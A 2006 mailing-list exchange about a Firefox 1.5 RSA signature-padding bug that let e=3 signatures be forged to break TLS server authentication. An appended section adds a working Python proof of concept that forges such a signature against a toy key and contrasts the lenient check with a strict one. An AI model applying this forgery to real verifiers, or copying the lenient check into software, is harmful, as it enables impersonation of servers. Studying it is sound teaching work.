> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] 
> Sent: Sunday, 17 September 2006 06:01
> 
> For another example of just how badly this kind of thing can 
> be done, look at this code excerpt from Firefox version 
> 1.5.0.7, which is the fixed version.  There are two PKCS-1 
> parsing functions, one which returns the hash and its prefix, 
> the other of which is given the hash and asked whether it 
> matches the RSA-signed value.  This is from the latter one:
> 
>     /*
>      * check the padding that was used
>      */
>     if (buffer[0] != 0 || buffer[1] != 1)
>         goto loser;
>     for (i = 2; i < modulus_len - hash_len - 1; i++) {
>         if (buffer[i] == 0)
>             break;
>         if (buffer[i] != 0xff)
>             goto loser;
>     }
> 
>     /*
>      * make sure we get the same results
>      */
>     if (PORT_Memcmp(buffer + modulus_len - hash_len, hash, hash_len) != 0)
>         goto loser;
> 
>     PORT_Free(buffer);
>     return SECSuccess;
> 
> Here, buffer holds the result of the RSA exponentiation, of 
> size modulus_len, and we are passed hash of size hash_len to compare.
> 
> I don't think this code is used, fortunately.  It will accept 
> anything of the form 0, 1, 0, garbage, hash.  Just goes to 
> show how easy it is to get this kind of parsing wrong.
> 

Unfortunately, this code _is_ used! It took me quite a while to understand 
under what circumstances, but here is the result. The problem is fixed as of 
version 1.5.0.8 (out now). Interestingly, the mozilla people fixed it by 
themselves in the 2.0 version (and any public beta I could find), but for the 
1.5 version it took my bug report...

So here is how the code is used and some hints (I am reluctant to give out the 
details right now, given that there are still many vulnerable systems out 
there. However, I am sure you can easily work out the details):

Whenever an SSL or TLS server sends a ServerKeyExchange message, the key 
contained in there is signed with a fresh nonce. This signature is checked 
using RSA_CheckSign(). 

Faking a signature for a key with a small exponent like 3 is easy. This can be 
used to break the SSL/TLS authentication.

Better upgrade asap...

Regards,
Ulrich

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]
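Worked example, added here and not part of the original post or of the NSS code it quotes: a Python re-creation of the lenient padding check from the quoted excerpt (which accepts 0x00 0x01 0x00, arbitrary bytes, hash) next to a strict PKCS#1 v1.5 check, plus a Bleichenbacher-style e=3 forgery of the "00 01 00 garbage hash" layout that the lenient check lets through. Everything below is constructed for the demonstration and is an assumption, not something the post states: a deterministic 1024-bit toy key with e=3 generated from a fixed seed, a sample message standing in for the signed ServerKeyExchange data, and the 36-byte MD5||SHA-1 digest that TLS 1.0/1.1 uses for that signature. The forgery needs no private key, only the public modulus and the fact that no modular reduction happens when s^3 < n.

```python
"""Lenient vs. strict PKCS#1 v1.5 checks and an e=3 forgery (added example,
stdlib only; key, message and digest layout are constructed assumptions)."""
import hashlib
import random

MODULUS_BITS = 1024
E = 3
rng = random.Random(2006)  # fixed seed: the toy key is reproducible


def is_probable_prime(n, rounds=32):
    """Miller-Rabin with random bases; good enough for a demo key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    """Prime with p % 3 == 2, so that 3 is invertible modulo p-1 (e=3)."""
    while True:
        p = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if p % 3 == 2 and is_probable_prime(p):
            return p


def gen_key():
    p, q = gen_prime(MODULUS_BITS // 2), gen_prime(MODULUS_BITS // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def tls_hash(msg):
    """MD5 || SHA-1: the 36-byte value TLS 1.0/1.1 signs without DigestInfo."""
    return hashlib.md5(msg).digest() + hashlib.sha1(msg).digest()


def check_padding_lenient(buf, h):
    """Mirrors the quoted loop: the first 0x00 after 00 01 ends the scan, so
    the bytes between that 0x00 and the trailing hash are never inspected."""
    k, hl = len(buf), len(h)
    if buf[0] != 0 or buf[1] != 1:
        return False
    for i in range(2, k - hl - 1):
        if buf[i] == 0:
            break
        if buf[i] != 0xFF:
            return False
    return buf[k - hl:] == h


def check_padding_strict(buf, h):
    """00 01, at least eight 0xFF bytes filling everything up to one 0x00 that
    sits immediately before the hash; nothing else is accepted."""
    k, hl = len(buf), len(h)
    if k < hl + 11 or buf[0] != 0 or buf[1] != 1:
        return False
    ps = buf[2:k - hl - 1]
    return all(b == 0xFF for b in ps) and buf[k - hl - 1] == 0 and buf[k - hl:] == h


def sign(n, d, h):
    k = (n.bit_length() + 7) // 8
    em = b"\x00\x01" + b"\xff" * (k - len(h) - 3) + b"\x00" + h
    return pow(int.from_bytes(em, "big"), d, n)


def verify(n, s, h, check):
    k = (n.bit_length() + 7) // 8
    return check(pow(s, E, n).to_bytes(k, "big"), h)


def icbrt(x):
    """floor(cbrt(x)) for a non-negative integer, by integer Newton steps."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + 2) // 3)  # starts above the root
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            return r
        r = nr


def forge(n, h):
    """Find s with s^3 = 00 01 00 || garbage || h as a k-byte value, s^3 < n.
    Low 8*hl bits: cube root of h modulo 2^(8*hl), which exists when h is odd
    (cubing permutes the odd residues). High bytes: pick the top part of s so
    the cube lands in [0x000100 * 256^(k-3), 0x000101 * 256^(k-3)).
    Returns None for an even h; the attacker then just tweaks the message."""
    k, hl = (n.bit_length() + 7) // 8, len(h)
    m, hv = 8 * hl, int.from_bytes(h, "big")
    if hv % 2 == 0:
        return None
    s_low = pow(hv, pow(3, -1, 1 << (m - 2)), 1 << m)  # group exponent 2^(m-2)
    lo, hi = 0x000100 << (8 * (k - 3)), 0x000101 << (8 * (k - 3))
    s = ((icbrt(lo) // (1 << m) + 1) << m) + s_low
    assert lo <= s ** 3 < hi < n, "modulus too small for this block layout"
    return s


def demo():
    n, d = gen_key()
    base = b"ServerKeyExchange params (constructed sample)"
    for i in range(256):  # attacker-controlled byte until the digest is odd
        h = tls_hash(base + bytes([i]))
        if h[-1] & 1:
            break
    genuine, forged = sign(n, d, h), forge(n, h)
    return {
        "genuine/lenient": verify(n, genuine, h, check_padding_lenient),
        "genuine/strict": verify(n, genuine, h, check_padding_strict),
        "forged/lenient": verify(n, forged, h, check_padding_lenient),
        "forged/strict": verify(n, forged, h, check_padding_strict),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:16s} {'accepted' if ok else 'rejected'}")
```

The forged value passes the lenient check and fails the strict one; the genuine signature passes both. The only degree of freedom the attacker needs is a message whose digest is odd, which is why the loop above nudges a trailing byte; a strict verifier that reconstructs the whole encoded block and compares it removes the problem regardless of the exponent.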
